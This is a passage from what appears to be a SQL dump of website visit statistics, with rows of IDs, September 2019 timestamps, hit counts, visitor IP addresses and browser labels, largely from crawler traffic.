e'),(446750,1567549465,1,1,0,0,'54.36.149.39','other'),(446751,1567549527,1,1,0,0,'8.29.198.26','other'),(446752,1567549560,2,2,0,0,'40.77.167.216','other'),(446753,1567550808,1,1,0,0,'141.8.188.11','other'),(446754,1567550944,1,1,0,0,'141.8.188.29','other'),(446755,1567553119,1,1,0,0,'141.8.188.11','other'),(446756,1567553120,1,1,0,0,'54.36.149.84','other'),(446757,1567553163,1,1,0,0,'141.8.188.29','other'),(446758,1567553333,1,1,0,0,'13.66.139.0','other'),(446759,1567553996,1,1,0,0,'87.250.224.81','other'),(446760,1567554088,1,1,0,0,'95.108.213.4','other'),(446761,1567554464,1,1,0,0,'40.77.167.13','other'),(446762,1567555554,1,1,0,0,'66.249.66.134','chrome'),(446763,1567555570,1,1,0,0,'40.77.167.13','other'),(446764,1567555861,1,1,0,0,'66.249.66.138','chrome'),(446765,1567556005,1,1,0,0,'54.36.149.50','other'),(446766,1567556131,1,1,0,0,'207.46.13.160','other'),(446767,1567556448,1,1,0,0,'5.45.207.79','other'),(446768,1567556452,1,1,0,0,'141.8.188.11','other'),(446769,1567556477,3,3,0,0,'141.8.188.29','other'),(446770,1567557646,1,1,0,0,'54.36.149.76','other'),(446771,1567557967,1,1,0,0,'66.249.66.138','chrome'),(446772,1567558029,1,1,0,0,'141.8.188.29','other'),(446773,1567558279,1,1,0,0,'54.36.149.60','other'),(446774,1567558680,1,1,0,0,'207.46.13.224','other'),(446775,1567559233,1,1,0,0,'8.29.198.25','other'),(446776,1567559716,1,1,0,0,'66.249.66.136','chrome'),(446777,1567560372,1,1,0,0,'141.8.188.11','other'),(446778,1567560395,1,1,0,0,'8.29.198.26','other'),(446779,1567560463,1,1,0,0,'40.77.167.13','other'),(446780,1567560767,2,2,0,0,'141.8.188.29','other'),(446781,1567561199,1,1,0,0,'66.249.66.136','chrome'),(446782,1567561645,1,1,0,0,'54.36.149.29','other'),(446783,1567562277,2,2,0,0,'141.8.188.29','other'),(446784,1567562896,1,1,0,0,'157.55.39.10','other'),(446785,1567563070,1,1,0,0,'141.8.188.11','other'),(446786,1567563167,1,1,0,0,'207.46.13.224','other'),(446787,1567563360,1,1,0,0,'51.68.152.26','chrome'),(446788,1567563692,2,2,0,0,'141.8.188.29','other'),(446789,1567564224,1,1,0,0,'54.36.149.5','other'),(446790,1567564642,1,1,0,0,'157.55.39.173','other'),(446791,1567564658,2,2,0,0,'141.8.188.11','other'),(446792,1567564704,2,2,0,0,'141.8.188.29','other'),(446793,1567565080,23,23,0,0,'178.63.13.154','other'),(446794,1567565711,1,1,0,0,'66.249.66.134','chrome'),(446795,1567565975,1,1,0,0,'207.46.13.224','other'),(446796,1567565991,2,2,0,0,'157.55.39.173','other'),(446797,1567567275,1,1,0,0,'54.36.149.31','other'),(446798,1567567723,32,32,0,0,'144.76.186.38','other'),(446799,1567568095,1,1,0,0,'54.36.149.77','other'),(446800,1567568573,1,1,0,0,'5.45.207.79','other'),(446801,1567568582,1,1,0,0,'141.8.188.29','other'),(446802,1567568859,2,2,0,0,'141.8.188.11','other'),(446803,1567568860,1,1,0,0,'207.46.13.148','other'),(446804,1567569156,1,1,0,0,'54.36.149.31','other'),(446805,1567569623,1,1,0,0,'66.249.66.136','chrome'),(446806,1567570118,1,1,0,0,'8.29.198.27','other'),(446807,1567570443,1,1,0,0,'40.77.167.162','other'),(446808,1567570483,1,1,0,0,'157.55.39.173','other'),(446809,1567570681,1,1,0,0,'141.8.188.11','other'),(446810,1567570739,3,3,0,0,'141.8.188.29','other'),(446811,1567570757,1,1,0,0,'66.249.66.134','chrome'),(446812,1567571259,1,1,0,0,'8.29.198.26','other'),(446813,1567571977,1,1,0,0,'141.8.142.108','other'),(446814,1567572131,1,1,0,0,'66.249.66.134','chrome'),(446815,1567572277,1,1,0,0,'62.205.134.182','other'),(446816,1567572281,1,1,0,0,'54.36.149.55','other'),(446817,1567572364,2,2,0,0,'141.8.188.11','other'),(446818,1567572410,1,1,0,0,'141.8.188.29','other'),(446819,1567572498,1,1,0,0,'5.45.207.79','other'),(446820,1567572790,1,1,0,0,'141.8.188.65','other'),(446821,1567572964,1,1,0,0,'66.249.66.66','chrome'),(446822,1567573280,1,1,0,0,'37.9.113.148','other'),(446823,1567573303,3,3,0,0,'141.8.188.11','other'),(446824,1567573441,3,3,0,0,'141.8.188.29','other'),(446825,1567573535,1,1,0,0,'157.55.39.133','other'),(446826,1567573670,1,1,0,0,'13.66.139.0','other'),(446827,1567573700,1,1,0,0,'54.36.149.17','other'),(446828,1567574238,3,3,0,0,'141.8.188.11','other'),(446829,1567574506,1,1,0,0,'141.8.188.29','other'),(446830,1567575424,1,1,0,0,'54.36.149.61','other'),(446831,1567575625,1,1,0,0,'207.46.13.122','other'),(446832,1567575786,7,7,0,0,'141.8.188.29','other'),(446833,1567576565,2,2,0,0,'141.8.188.11','other'),(446834,1567576636,1,1,0,0,'54.36.149.16','other'),(446835,1567576773,2,2,0,0,'141.8.188.29','other'),(446836,1567577358,1,1,0,0,'54.36.149.102','other'),(446837,1567577419,1,1,0,0,'207.46.13.122','other'),(446838,1567578008,1,1,0,0,'141.8.188.29','other'),(446839,1567578372,1,1,0,0,'91.196.177.46','chrome'),(446840,1567578693,1,1,0,0,'40.77.167.162','other'),(446841,1567578997,2,2,0,0,'66.249.66.138','chrome'),(446842,1567579407,2,2,0,0,'141.8.188.11','other'),(446843,1567579908,24,24,0,0,'37.17.172.132','firefox'),(446844,1567579996,1,1,0,0,'40.77.167.82','other'),(446845,1567580031,1,1,0,0,'40.77.167.162','other'),(446846,1567580133,1,1,0,0,'91.196.178.89','chrome'),(446847,1567580150,1,1,0,0,'46.211.133.203','chrome'),(446848,1567580177,1,1,0,0,'37.53.90.175','chrome'),(446849,1567580821,8,8,0,0,'37.17.172.132','firefox'),(446850,1567581001,1,1,0,0,'8.29.198.27','other'),(446851,1567581237,1,1,0,0,'54.36.149.47','other'),(446852,1567581689,2,2,0,0,'207.46.13.45','other'),(446853,1567581693,1,1,0,0,'40.77.167.82','other'),(446854,1567582114,1,1,0,0,'37.55.82.39','chrome'),(446855,1567582117,3,3,0,0,'88.99.2.203','other'),(446856,1567582123,1,1,0,0,'8.29.198.27','other'),(446857,1567582394,2,2,0,0,'141.8.188.11','other'),(446858,1567582758,1,1,0,0,'66.249.66.138','chrome'),(446859,1567582968,1,1,0,0,'54.36.149.73','other'),(446860,1567583086,1,1,0,0,'88.99.2.203','other'),(446861,1567583691,1,1,0,0,'92.112.253.230','firefox'),(446862,1567583750,1,1,0,0,'66.249.66.134','chrome'),(446863,1567583981,1,1,0,0,'54.36.149.40','other'),(446864,1567583988,1,1,0,0,'88.99.2.203','other'),(446865,1567584534,1,1,0,0,'134.249.146.125','chrome'),(446866,1567584742,2,2,0,0,'207.46.13.124','other'),(446867,1567584946,1,1,0,0,'88.99.2.203','other'),(446868,1567584958,1,1,0,0,'5.45.207.79','other'),(446869,1567584981,3,3,0,0,'141.8.188.29','other'),(446870,1567585525,1,1,0,0,'54.36.149.98','other'),(446871,1567585819,1,1,0,0,'157.55.39.139','other'),(446872,1567586297,1,1,0,0,'141.8.188.29','other'),(446873,1567586835,1,1,0,0,'141.8.188.11','other'),(446874,1567587295,1,1,0,0,'40.77.167.39','other'),(446875,1567587314,1,1,0,0,'37.9.113.20','other'),(446876,1567587612,1,1,0,0,'5.53.116.12','chrome'),(446877,1567587883,1,1,0,0,'87.250.224.47','other'),(446878,1567588211,1,1,0,0,'5.45.207.79','other'),(446879,1567588339,3,3,0,0,'141.8.188.29','other'),(446880,1567589156,1,1,0,0,'141.8.188.11','other'),(446881,1567589284,1,1,0,0,'141.8.188.29','other'),(446882,1567589291,1,1,0,0,'54.36.149.94','other'),(446883,1567589986,1,1,0,0,'54.36.149.34','other'),(446884,1567591155,1,1,0,0,'141.8.188.11','other'),(446885,1567591627,1,1,0,0,'54.36.149.5','other'),(446886,1567591646,1,1,0,0,'91.196.177.227','chrome'),(446887,1567591673,2,2,0,0,'66.249.66.134','chrome'),(446888,1567591875,1,1,0,0,'8.29.198.26','other'),(446889,1567592082,2,2,0,0,'207.46.13.6','other'),(446890,1567592188,2,2,0,0,'66.249.66.138','chrome'),(446891,1567592899,1,1,0,0,'91.196.177.227','chrome'),(446892,1567592909,1,1,0,0,'46.211.97.150','chrome'),(446893,1567592999,1,1,0,0,'8.29.198.26','other'),(446894,1567593037,1,1,0,0,'87.250.224.47','other'),(446895,1567593046,1,1,0,0,'5.45.207.19','other'),(446896,1567593701,1,1,0,0,'141.8.142.103','other'),(446897,1567593730,1,1,0,0,'141.8.188.29','other'),(446898,1567593747,2,2,0,0,'95.213.141.126','opera'),(446899,1567594516,3,3,0,0,'141.8.188.11','other'),(446900,1567594699,1,1,0,0,'207.46.13.10','other'),(446901,1567594920,1,1,0,0,'157.55.39.255','other'),(446902,1567595428,1,1,0,0,'54.36.149.21','other'),(446903,1567595459,1,1,0,0,'37.9.113.148','other'),(446904,1567595751,1,1,0,0,'207.46.13.10','other'),(446905,1567596617,1,1,0,0,'66.249.66.64','chrome'),(446906,1567597397,1,1,0,0,'66.249.66.138','chrome'),(446907,1567597867,2,2,0,0,'157.55.39.222','other'),(446908,1567598115,1,1,0,0,'109.74.154.72','chrome'),(446909,1567598283,1,1,0,0,'91.196.178.65','chrome'),(446910,1567598430,1,1,0,0,'157.55.39.255','other'),(446911,1567598905,1,1,0,0,'157.55.39.222','other'),(446912,1567599510,1,1,0,0,'91.196.178.65','chrome'),(446913,1567599731,1,1,0,0,'37.9.113.148','other'),(446914,1567599935,1,1,0,0,'91.196.177.42','chrome'),(446915,1567600159,1,1,0,0,'157.55.39.241','other'),(446916,1567600741,2,2,0,0,'157.55.39.222','other'),(446917,1567600935,1,1,0,0,'91.209.11.236','other'),(446918,1567601324,1,1,0,0,'54.36.149.37','other'),(446919,1567601367,1,1,0,0,'157.55.39.241','other'),(446920,1567601519,1,1,0,0,'37.9.113.103','other'),(446921,1567601789,1,1,0,0,'46.133.197.6','other'),(446922,1567602032,1,1,0,0,'54.36.149.14','other'),(446923,1567602187,1,1,0,0,'54.36.149.32','other'),(446924,1567602223,1,1,0,0,'95.108.213.4','other'),(446925,1567602249,1,1,0,0,'141.8.142.144','other'),(446926,1567602756,1,1,0,0,'8.29.198.27','other'),(446927,1567603136,1,1,0,0,'157.55.39.222','other'),(446928,1567603147,1,1,0,0,'94.178.88.110','firefox'),(446929,1567603388,2,2,0,0,'88.99.2.203','other'),(446930,1567603821,1,1,0,0,'141.8.188.65','other'),(446931,1567603837,1,1,0,0,'141.8.142.144','other'),(446932,1567603884,1,1,0,0,'8.29.198.25','other'),(446933,1567604241,1,1,0,0,'66.249.66.134','chrome'),(446934,1567604512,2,2,0,0,'141.8.188.49','other'),(446935,1567605255,1,1,0,0,'91.196.159.42','chrome'),(446936,1567605504,2,2,0,0,'66.249.66.138','chrome'),(446937,1567605816,2,2,0,0,'66.249.66.136','chrome'),(446938,1567605824,1,1,0,0,'66.249.66.134','chrome'),(446939,1567606192,1,1,0,0,'157.55.39.231','other'),(446940,1567606438,1,1,0,0,'209.17.97.10','other'),(446941,1567606475,1,1,0,0,'54.36.149.17','other'),(446942,1567606562,1,1,0,0,'54.36.149.20','other'),(446943,1567606837,1,1,0,0,'77.222.143.222','msie'),(446944,1567606873,1,1,0,0,'46.211.102.160','chrome'),(446945,1567606889,1,1,0,0,'141.8.132.16','other'),(446946,1567607120,2,2,0,0,'194.37.248.11','chrome'),(446947,1567607265,1,1,0,0,'54.36.149.95','other'),(446948,1567607272,1,1,0,0,'109.63.206.32','msie'),(446949,1567607277,1,1,0,0,'37.204.206.150','msie'),(446950,1567607713,1,1,0,0,'54.36.149.44','other'),(446951,1567607735,1,1,0,0,'178.154.171.17','other'),(446952,1567607745,1,1,0,0,'141.8.142.103','other'),(446953,1567607756,1,1,0,0,'37.9.113.103','other'),(446954,1567608447,1,1,0,0,'54.36.149.12','other'),(446955,1567608489,1,1,0,0,'87.250.224.118','other'),(446956,1567608588,1,1,0,0,'5.45.207.19','other'),(446957,1567609259,1,1,0,0,'66.249.66.136','chrome'),(446958,1567610098,1,1,0,0,'157.55.39.241','other'),(446959,1567610387,1,1,0,0,'209.17.97.10','other'),(446960,1567610855,1,1,0,0,'46.211.0.130','chrome'),(446961,1567610962,1,1,0,0,'212.1.93.94','chrome'),(446962,1567610997,1,1,0,0,'157.55.39.231','other'),(446963,1567611058,1,1,0,0,'13.66.139.0','other'),(446964,1567611234,1,1,0,0,'5.255.253.38','other'),(446965,1567612740,2,2,0,0,'141.8.188.29','other'),(446966,1567612807,1,1,0,0,'66.249.66.138','chrome'),(446967,1567612962,1,1,0,0,'66.249.66.136','chrome'),(446968,1567613022,1,1,0,0,'91.196.178.93','firefox'),(446969,1567613345,1,1,0,0,'157.55.39.241','other'),(446970,1567613451,1,1,0,0,'92.60.183.213','chrome'),(446971,1567613618,1,1,0,0,'8.29.198.26','other'),(446972,1567613758,1,1,0,0,'37.9.113.148','other'),(446973,1567613894,1,1,0,0,'77.123.36.10','chrome'),(446974,1567614717,1,1,0,0,'141.8.188.29','other'),(446975,1567614751,1,1,0,0,'8.29.198.27','other'),(446976,1567614840,1,1,0,0,'141.8.188.65','other'),(446977,1567615753,1,1,0,0,'66.249.66.134','chrome'),(446978,1567615836,1,1,0,0,'141.8.188.11','other'),(446979,1567616012,1,1,0,0,'157.55.39.222','other'),(446980,1567616616,1,1,0,0,'157.55.39.241','other'),(446981,1567616701,1,1,0,0,'141.8.188.29','other'),(446982,1567617088,1,1,0,0,'138.246.253.5','chrome'),(446983,1567617307,1,1,0,0,'77.222.143.222','msie'),(446984,1567617584,1,1,0,0,'91.196.178.61','chrome'),(446985,1567617648,4,4,0,0,'66.249.66.138','chrome'),(446986,1567617791,6,6,0,0,'66.249.66.134','chrome'),(446987,1567617880,5,5,0,0,'66.249.66.136','chrome'),(446988,1567618237,1,1,0,0,'5.45.207.79','other'),(446989,1567618241,1,1,0,0,'5.45.207.19','other'),(446990,1567618243,1,1,0,0,'95.108.213.4','other'),(446991,1567618784,1,1,0,0,'66.249.66.138','chrome'),(446992,1567618834,1,1,0,0,'66.249.66.134','chrome'),(446993,1567618958,1,1,0,0,'207.46.13.112','other'),(446994,1567619544,1,1,0,0,'141.8.188.11','other'),(446995,1567619808,8,8,0,0,'66.249.66.134','chrome'),(446996,1567619902,4,4,0,0,'66.249.66.138','chrome'),(446997,1567620371,2,2,0,0,'66.249.66.136','chrome'),(446998,1567620503,1,1,0,0,'141.8.142.103','other'),(446999,1567620676,1,1,0,0,'91.209.11.236','other'),(447000,1567620838,1,1,0,0,'157.55.39.231','other'),(447001,1567620851,2,2,0,0,'66.249.66.134','chrome'),(447002,1567620967,1,1,0,0,'157.55.39.222','other'),(447003,1567621620,1,1,0,0,'66.249.66.138','chrome'),(447004,1567622164,3,3,0,0,'66.249.66.66','chrome'),(447005,1567622347,2,2,0,0,'66.249.66.136','chrome'),(447006,1567622366,2,2,0,0,'66.249.66.134','chrome'),(447007,1567622760,1,1,0,0,'207.46.13.112','other'),(447008,1567623066,1,1,0,0,'66.249.66.68','chrome'),(447009,1567623073,2,2,0,0,'37.9.113.103','other'),(447010,1567623579,2,2,0,0,'66.249.66.134','chrome'),(447011,1567623817,1,1,0,0,'87.250.224.64','other'),(447012,1567623978,2,2,0,0,'46.133.49.254','chrome'),(447013,1567624382,1,1,0,0,'66.249.66.64','chrome'),(447014,1567624458,1,1,0,0,'66.249.66.66','chrome'),(447015,1567624489,1,1,0,0,'66.249.66.138','chrome'),(447016,1567624506,1,1,0,0,'8.29.198.25','other'),(447017,1567624676,1,1,0,0,'5.255.253.25','other'),(447018,1567624773,2,2,0,0,'66.249.66.134','chrome'),(447019,1567624965,1,1,0,0,'66.249.66.136','chrome'),(447020,1567625355,1,1,0,0,'207.46.13.85','other'),(447021,1567625649,1,1,0,0,'8.29.198.26','other'),(447022,1567625753,1,1,0,0,'66.249.66.134','chrome'),(447023,1567625831,1,1,0,0,'141.8.188.11','other'),(447024,1567625927,1,1,0,0,'66.249.66.136','chrome'),(447025,1567626611,1,1,0,0,'207.46.13.204','other'),(447026,1567626707,1,1,0,0,'66.249.66.138','chrome'),(447027,1567626755,5,5,0,0,'66.249.66.134','chrome'),(447028,1567626863,4,4,0,0,'66.249.66.136','chrome'),(447029,1567627133,1,1,0,0,'66.249.66.68','chrome'),(447030,1567627656,1,1,0,0,'66.249.66.138','chrome'),(447031,1567628335,2,2,0,0,'66.249.66.134','chrome'),(447032,1567628413,1,1,0,0,'207.46.13.9','other'),(447033,1567628707,1,1,0,0,'66.249.66.136','chrome'),(447034,1567628771,1,1,0,0,'207.46.13.181','other'),(447035,1567628826,1,1,0,0,'141.8.188.11','other'),(447036,1567628900,1,1,0,0,'66.249.66.138','chrome'),(447037,1567628973,1,1,0,0,'141.8.188.29','other'),(447038,1567629178,1,1,0,0,'66.249.66.68','chrome'),(447039,1567629476,1,1,0,0,'207.46.13.204','other'),(447040,1567630307,1,1,0,0,'66.249.66.64','chrome'),(447041,1567630430,2,2,0,0,'66.249.66.134','chrome'),(447042,1567630771,1,1,0,0,'207.46.13.204','other'),(447043,1567630978,1,1,0,0,'66.249.66.138','chrome'),(447044,1567631331,1,1,0,0,'207.46.13.9','other'),(447045,1567632126,1,1,0,0,'207.46.13.204','other'),(447046,1567632178,1,1,0,0,'66.249.66.138','chrome'),(447047,1567632263,1,1,0,0,'141.8.188.29','other'),(447048,1567632348,3,3,0,0,'66.249.66.134','chrome'),(447049,1567632468,1,1,0,0,'157.245.12.94','other'),(447050,1567633267,1,1,0,0,'141.8.188.11','other'),(447051,1567633294,2,2,0,0,'66.249.66.136','chrome'),(447052,1567633746,1,1,0,0,'141.8.188.29','other'),(447053,1567634267,1,1,0,0,'207.46.13.204','other'),(447054,1567635073,1,1,0,0,'66.249.66.136','chrome'),(447055,1567635394,1,1,0,0,'8.29.198.26','other'),(447056,1567635671,1,1,0,0,'66.249.66.64','chrome'),(447057,1567635905,1,1,0,0,'207.46.13.181','other'),(447058,1567635971,1,1,0,0,'207.46.13.204','other'),(447059,1567636026,1,1,0,0,'66.249.66.66','chrome'),(447060,1567636120,1,1,0,0,'66.249.66.68','chrome'),(447061,1567636205,1,1,0,0,'66.249.66.134','chrome'),(447062,1567636512,1,1,0,0,'8.29.198.27','other'),(447063,1567636830,2,2,0,0,'207.46.13.181','other'),(447064,1567637386,1,1,0,0,'66.249.66.68','chrome'),(447065,1567637857,1,1,0,0,'66.249.66.66','chrome'),(447066,1567638081,1,1,0,0,'207.46.13.204','other'),(447067,1567639315,1,1,0,0,'66.249.66.138','chrome'),(447068,1567639407,1,1,0,0,'207.46.13.204','other'),(447069,1567640470,1,1,0,0,'66.249.66.134','chrome'),(447070,1567641304,1,1,0,0,'66.249.66.138','chrome'),(447071,1567641378,1,1,0,0,'207.46.13.204','other'),(447072,1567642277,1,1,0,0,'157.55.39.236','other'),(447073,1567642385,1,1,0,0,'66.249.66.138','chrome'),(447074,1567642888,1,1,0,0,'167.71.244.194','other'),(447075,1567642982,1,1,0,0,'13.66.139.0','other'),(447076,1567643262,1,1,0,0,'91.209.11.236','other'),(447077,1567643308,1,1,0,0,'157.55.39.236','other'),(447078,1567643417,1,1,0,0,'188.255.114.86','msie'),(447079,1567643442,2,2,0,0,'66.249.66.134','chrome'),(447080,1567643447,1,1,0,0,'207.46.13.181','other'),(447081,1567643540,1,1,0,0,'66.249.66.136','chrome'),(447082,1567643731,1,1,0,0,'207.46.13.9','other'),(447083,1567644557,1,1,0,0,'66.249.66.138','chrome'),(447084,1567644893,2,2,0,0,'66.249.66.64','chrome'),(447085,1567645087,1,1,0,0,'66.249.66.136','chrome'),(447086,1567645356,2,2,0,0,'157.55.39.236','other'),(447087,1567645710,1,1,0,0,'40.77.167.140','other'),(447088,1567645840,1,1,0,0,'40.77.167.144','other'),(447089,1567646227,1,1,0,0,'92.63.111.27','chrome'),(447090,1567646264,1,1,0,0,'8.29.198.25','other'),(447091,1567647383,1,1,0,0,'8.29.198.25','other'),(447092,1567648125,2,2,0,0,'40.77.167.140','other'),(447093,1567649379,1,1,0,0,'40.77.167.140','other'),(447094,1567649523,1,1,0,0,'66.249.66.138','chrome'),(447095,1567650115,1,1,0,0,'66.249.66.136','chrome'),(447096,1567650117,1,1,0,0,'66.249.66.68','chrome'),(447097,1567650627,1,1,0,0,'40.77.167.140','other'),(447098,1567651439,1,1,0,0,'157.55.39.90','other'),(447099,1567651907,2,2,0,0,'66.249.66.66','chrome'),(447100,1567652197,2,2,0,0,'157.55.39.154','other'),(447101,1567653230,1,1,0,0,'66.249.66.134','chrome'),(447102,1567653247,1,1,0,0,'40.77.167.140','other'),(447103,1567653637,1,1,0,0,'157.55.39.90','other'),(447104,1567654388,1,1,0,0,'66.249.66.136','chrome'),(447105,1567655407,1,1,0,0,'37.9.113.13','other'),(447106,1567655453,1,1,0,0,'66.249.66.134','chrome'),(447107,1567655563,1,1,0,0,'66.249.66.136','chrome'),(447108,1567656203,1,1,0,0,'66.249.66.66','chrome'),(447109,1567656661,2,2,0,0,'157.55.39.90','other'),(447110,1567657146,1,1,0,0,'8.29.198.25','other'),(447111,1567657154,3,3,0,0,'66.249.66.136','chrome'),(447112,1567657210,1,1,0,0,'66.249.66.134','chrome'),(447113,1567657382,1,1,0,0,'91.196.178.136','firefox'),(447114,1567658238,1,1,0,0,'8.29.198.25','other'),(447115,1567658355,2,2,0,0,'66.249.66.136','chrome'),(447116,1567658433,1,1,0,0,'157.55.39.236','other'),(447117,1567658690,1,1,0,0,'62.205.134.182','other'),(447118,1567658725,2,2,0,0,'207.46.13.90','other'),(447119,1567659015,2,2,0,0,'66.249.66.134','chrome'),(447120,1567660411,1,1,0,0,'66.249.66.134','chrome'),(447121,1567660420,2,2,0,0,'157.55.39.90','other'),(447122,1567660471,1,1,0,0,'157.55.39.236','other'),(447123,1567663174,1,1,0,0,'207.46.13.90','other'),(447124,1567664038,1,1,0,0,'66.249.66.134','chrome'),(447125,1567664988,1,1,0,0,'66.249.66.138','chrome'),(447126,1567665389,1,1,0,0,'95.132.7.39','chrome'),(447127,1567665514,1,1,0,0,'2.95.181.156','chrome'),(447128,1567665961,1,1,0,0,'141.8.142.144','other'),(447129,1567666782,1,1,0,0,'66.249.66.134','chrome'),(447130,1567667624,2,2,0,0,'13.66.139.0','other'),(447131,1567667827,1,1,0,0,'82.117.81.74','chrome'),(447132,1567668007,1,1,0,0,'8.29.198.27','other'),(447133,1567668307,1,1,0,0,'157.55.39.90','other'),(447134,1567668868,1,1,0,0,'207.46.13.90','other'),(447135,1567669099,1,1,0,0,'8.29.198.26','other'),(447136,1567669148,2,2,0,0,'207.46.13.39','other'),(447137,1567670094,1,1,0,0,'167.71.105.42','other'),(447138,1567670319,1,1,0,0,'91.209.11.236','other'),(447139,1567670525,1,1,0,0,'167.71.89.189','other'),(447140,1567670842,1,1,0,0,'207.46.13.24','other'),(447141,1567671548,1,1,0,0,'93.183.202.190','chrome'),(447142,1567672433,1,1,0,0,'66.249.66.134','chrome'),(447143,1567672467,2,2,0,0,'207.46.13.39','other'),(447144,1567674609,1,1,0,0,'207.46.13.90','other'),(447145,1567675051,1,1,0,0,'176.36.21.189','chrome'),(447146,1567675889,1,1,0,0,'66.249.66.136','chrome'),(447147,1567675990,2,2,0,0,'195.250.47.11','chrome'),(447148,1567676306,1,1,0,0,'91.209.11.236','other'),(447149,1567676856,1,1,0,0,'141.8.188.11','other'),(447150,1567677289,1,1,0,0,'66.249.66.136','chrome'),(447151,1567677452,1,1,0,0,'157.55.39.125','other'),(447152,1567677886,1,1,0,0,'141.8.188.29','other'),(447153,1567678624,1,1,0,0,'109.74.154.72','chrome'),(447154,1567678864,1,1,0,0,'8.29.198.25','other'),(447155,1567678905,1,1,0,0,'46.200.73.242','chrome'),(447156,1567678917,1,1,0,0,'141.8.188.29','other'),(447157,1567678956,1,1,0,0,'141.8.188.11','other'),(447158,1567679520,1,1,0,0,'66.249.66.64','chrome'),(447159,1567679964,1,1,0,0,'8.29.198.25','other'),(447160,1567681074,1,1,0,0,'157.55.39.125','other'),(447161,1567681109,1,1,0,0,'91.209.11.236','other'),(447162,1567681575,1,1,0,0,'141.8.188.11','other'),(447163,1567681646,2,1,1,0,'66.249.66.136',''),(447164,1567682817,1,1,0,0,'207.46.13.106','other'),(447165,1567682988,1,1,0,0,'157.55.39.125','other'),(447166,1567683006,1,1,0,0,'141.8.188.11','other'),(447167,1567683983,1,1,0,0,'157.55.39.125','other'),(447168,1567684106,1,1,0,0,'66.249.66.136','chrome'),(447169,1567684455,1,1,0,0,'141.8.188.29','other'),(447170,1567684473,1,1,0,0,'5.45.207.19','other'),(447171,1567684529,1,1,0,0,'141.8.188.11','other'),(447172,1567684630,1,1,0,0,'207.46.13.39','other'),(447173,1567685145,1,1,0,0,'77.222.143.222','msie'),(447174,1567685914,1,1,0,0,'207.46.13.39','other'),(447175,1567686251,1,1,0,0,'91.196.178.73','chrome'),(447176,1567686887,2,2,0,0,'141.8.188.11','other'),(447177,1567687616,1,1,0,0,'141.8.188.29','other'),(447178,1567687953,2,2,0,0,'66.249.66.68','chrome'),(447179,1567688927,1,1,0,0,'141.8.188.29','other'),(447180,1567689031,1,1,0,0,'141.8.188.11','other'),(447181,1567689203,2,2,0,0,'91.196.178.169','chrome'),(447182,1567689228,2,2,0,0,'37.9.113.103','other'),(447183,1567689751,1,1,0,0,'8.29.198.26','other'),(447184,1567689785,1,1,0,0,'46.42.130.126','msie'),(447185,1567689838,1,1,0,0,'66.249.66.68','chrome'),(447186,1567690032,1,1,0,0,'91.196.178.190','chrome'),(447187,1567690107,2,2,0,0,'141.8.188.29','other'),(447188,1567690117,1,1,0,0,'157.55.39.229','other'),(447189,1567690825,1,1,0,0,'141.8.142.103','other'),(447190,1567690831,1,1,0,0,'8.29.198.26','other'),(447191,1567690860,1,1,0,0,'141.8.188.11','other'),(447192,1567691018,1,1,0,0,'178.93.6.39','chrome'),(447193,1567691141,1,1,0,0,'207.46.13.34','other'),(447194,1567691817,1,1,0,0,'5.45.207.19','other'),(447195,1567691877,1,1,0,0,'66.249.66.136','chrome'),(447196,1567692726,1,1,0,0,'87.250.224.81','other'),(447197,1567692852,1,1,0,0,'66.249.66.138','chrome'),(447198,1567692970,1,1,0,0,'207.46.13.106','other'),(447199,1567694247,1,1,0,0,'66.249.66.136','chrome'),(447200,1567694912,1,1,0,0,'40.77.167.66','other'),(447201,1567695324,1,1,0,0,'5.45.207.19','other'),(447202,1567695441,1,1,0,0,'207.46.13.84','other'),(447203,1567695834,1,1,0,0,'141.8.188.29','other'),(447204,1567696802,1,1,0,0,'207.46.13.84','other'),(447205,1567697198,1,1,0,0,'157.245.42.249','chrome'),(447206,1567697215,1,1,0,0,'66.249.66.134','chrome'),(447207,1567697318,4,4,0,0,'88.99.2.203','other'),(447208,1567697458,1,1,0,0,'91.196.178.172','firefox'),(447209,1567697783,1,1,0,0,'66.249.66.138','chrome'),(447210,1567698151,1,1,0,0,'207.46.13.84','other'),(447211,1567698234,1,1,0,0,'172.111.183.59','chrome'),(447212,1567698288,1,1,0,0,'88.99.2.203','other'),(447213,1567699189,1,1,0,0,'88.99.2.203','other'),(447214,1567699798,1,1,0,0,'207.46.13.84','other'),(447215,1567700056,1,1,0,0,'66.249.66.134','chrome'),(447216,1567700147,1,1,0,0,'88.99.2.203','other'),(447217,1567700194,1,1,0,0,'62.80.185.138','chrome'),(447218,1567700333,1,1,0,0,'66.249.66.66','chrome'),(447219,1567700623,1,1,0,0,'8.29.198.25','other'),(447220,1567701462,1,1,0,0,'40.77.167.66','other'),(447221,1567701541,1,1,0,0,'62.80.185.138','chrome'),(447222,1567701675,1,1,0,0,'141.8.142.103','other'),(447223,1567701698,1,1,0,0,'8.29.198.25','other'),(447224,1567701919,1,1,0,0,'46.211.74.72','chrome'),(447225,1567702142,1,1,0,0,'13.66.139.0','other'),(447226,1567702516,1,1,0,0,'157.55.39.209','other'),(447227,1567702590,1,1,0,0,'62.80.185.138','chrome'),(447228,1567702682,1,1,0,0,'40.77.167.66','other'),(447229,1567702731,1,1,0,0,'141.8.188.11','other'),(447230,1567702799,1,1,0,0,'141.8.188.29','other'),(447231,1567702896,1,1,0,0,'66.249.66.134','chrome'),(447232,1567703331,1,1,0,0,'95.108.213.4','other'),(447233,1567704326,2,2,0,0,'88.99.2.203','other'),(447234,1567704336,1,1,0,0,'136.243.70.68','other'),(447235,1567704433,1,1,0,0,'157.55.39.198','other'),(447236,1567704553,1,1,0,0,'141.8.188.11','other'),(447237,1567704621,1,1,0,0,'95.108.213.4','other'),(447238,1567706598,1,1,0,0,'40.77.167.57','other'),(447239,1567706637,1,1,0,0,'5.45.207.79','other'),(447240,1567707366,2,2,0,0,'66.249.66.136','chrome'),(447241,1567707479,1,1,0,0,'66.249.66.134','chrome'),(447242,1567707671,2,2,0,0,'141.8.188.29','other'),(447243,1567708726,1,1,0,0,'141.8.142.103','other'),(447244,1567709038,1,1,0,0,'40.77.167.57','other'),(447245,1567709836,2,2,0,0,'141.8.188.11','other'),(447246,1567709894,1,1,0,0,'141.8.188.29','other'),(447247,1567711491,1,1,0,0,'8.29.198.27','other'),(447248,1567712241,1,1,0,0,'141.8.188.29','other'),(447249,1567712392,1,1,0,0,'207.46.13.204','other'),(447250,1567712595,1,1,0,0,'8.29.198.26','other'),(447251,1567712736,1,1,0,0,'157.55.39.198','other'),(447252,1567712768,3,3,0,0,'66.249.66.136','chrome'),(447253,1567712947,1,1,0,0,'66.249.66.66','chrome'),(447254,1567713175,1,1,0,0,'193.106.30.99','chrome'),(447255,1567713724,1,1,